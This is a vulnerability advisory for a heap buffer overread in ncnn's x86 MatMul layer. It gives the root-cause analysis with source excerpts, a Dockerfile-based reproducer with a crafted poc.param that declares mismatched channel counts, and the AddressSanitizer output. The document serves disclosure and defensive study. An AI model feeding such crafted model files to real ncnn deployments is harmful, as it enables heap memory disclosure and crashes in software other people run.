Heap Buffer Overread in Batched MatMul
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:63 in pack_A_tile
Sanitizer verdict: heap-buffer-overflow
Summary
The x86 MatMul 3-D path sets its batch count to std::max(A.c, B.c) and substitutes channel 0 only when a side has exactly one channel, so two operands with different non-singleton batch counts are neither rejected nor broadcast. A model with A = 16x16x2 and B = 16x16x3 therefore runs three iterations and hands Gemm a Mat produced by A1.channel(2), which points at the very end of A's allocation. pack_A_tile then loads 64-byte AVX-512 vectors from rows of that view and reads past the heap buffer. The entry point is ncnnoptimize, whose ModelWriter::shape_inference() materialises the declared inputs and forwards the layer.
Detail
MatMul_x86::forward picks the batch dimension from whichever operand is larger and only guards the singleton case:
// src/layer/x86/matmul_x86.cpp:162
const int batch_size = std::max(A1.c, B1.c);
top_blob.create(N, M, batch_size, elemsize, opt.blob_allocator);
if (top_blob.empty())
return -100;
for (int p = 0; p < batch_size; p++)
{
int Ap = A1.c == 1 ? 0 : p;
int Bp = B1.c == 1 ? 0 : p;
std::vector<Mat> _bottom_blobs(2);
_bottom_blobs[0] = A1.channel(Ap);
_bottom_blobs[1] = B1.channel(Bp);
// src/layer/x86/gemm_x86.cpp:44
static void pack_A_tile(const Mat& A, Mat& AT, int i, int max_ii, int k, int max_kk)
{
const int elempack = A.elempack;
const size_t A_hstep = A.dims == 3 ? A.cstep : (size_t)A.w;
There is no A1.c == B1.c || A1.c == 1 || B1.c == 1 precondition. With A1.c == 2 and B1.c == 3, batch_size is 3 and the p == 2 iteration evaluates A1.channel(2) on a two-channel Mat. Mat::channel performs no range check — it just builds a view at data + cstep * _c * elemsize — so the resulting operand points exactly one channel past A's data.
A is created by shape inference as a 16x16x2 float tensor: cstep = alignSize(16 * 16 * 4, 16) / 4 = 256 floats, a 2048-byte payload, and 2116 bytes of allocation once the 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD pad are counted. A1.channel(2) therefore starts at byte 2048, at the end of the payload, and is a dims == 2 view that pack_A_tile then walks.
Because the view is 2-D, A_hstep is A.w == 16, and the packer forms one row pointer per output row: p1 = (const float*)A + (i + ii + 1) * A_hstep + k, i.e. byte 2048 + 64 = 2112. The 64-byte _mm512_loadu_ps on that pointer (the unpacked branch of the same function, line 125) spans bytes 2112..2175 while the allocation ends at 2116 — the overread ASan reports. Rows beyond the first read progressively further out of bounds, so the amount of adjacent heap data pulled into the GEMM scales with the declared M.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overread-in-batched-matmul && cd ncnn-poc-heap-buffer-overread-in-batched-matmul
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
3 3
Input A 0 1 A 0=16 1=16 2=2
Input B 0 1 B 0=16 1=16 2=3
MatMul mm 2 1 A B out
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51d0000008c0 at pc 0x5654e041570c bp 0x7ffc8c7f2770 sp 0x7ffc8c7f2760
READ of size 64 at 0x51d0000008c0 thread T0
#0 0x5654e041570b in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
#1 0x5654e041570b in pack_A_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:125
#2 0x5654e04bac76 in gemm_x86 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:6969
#3 0x5654e0500c11 in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7796
#4 0x5654e282554e in ncnn::MatMul_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/matmul_x86_avx512.cpp:178
#5 0x5654d9e0870b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#6 0x5654d9df0b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x5654d9e509e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x5654d9ce23c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x5654d9d5feee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x7688125001c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x76881250028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x5654d9cdf624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x51d0000008c4 is located 0 bytes after 2116-byte region [0x51d000000080,0x51d0000008c4)
allocated by thread T0 here:
#0 0x768812b79f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5654d9db092d in fastMalloc /ncnn/src/allocator.h:62
#2 0x5654d9db092d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x5654d9ce0ca0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:390
#4 0x5654d9d5feee in main /ncnn/tools/ncnnoptimize.cpp:2844
#5 0x7688125001c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x76881250028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x5654d9cdf624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)
Credit
Zheng Yu @ DepthFirst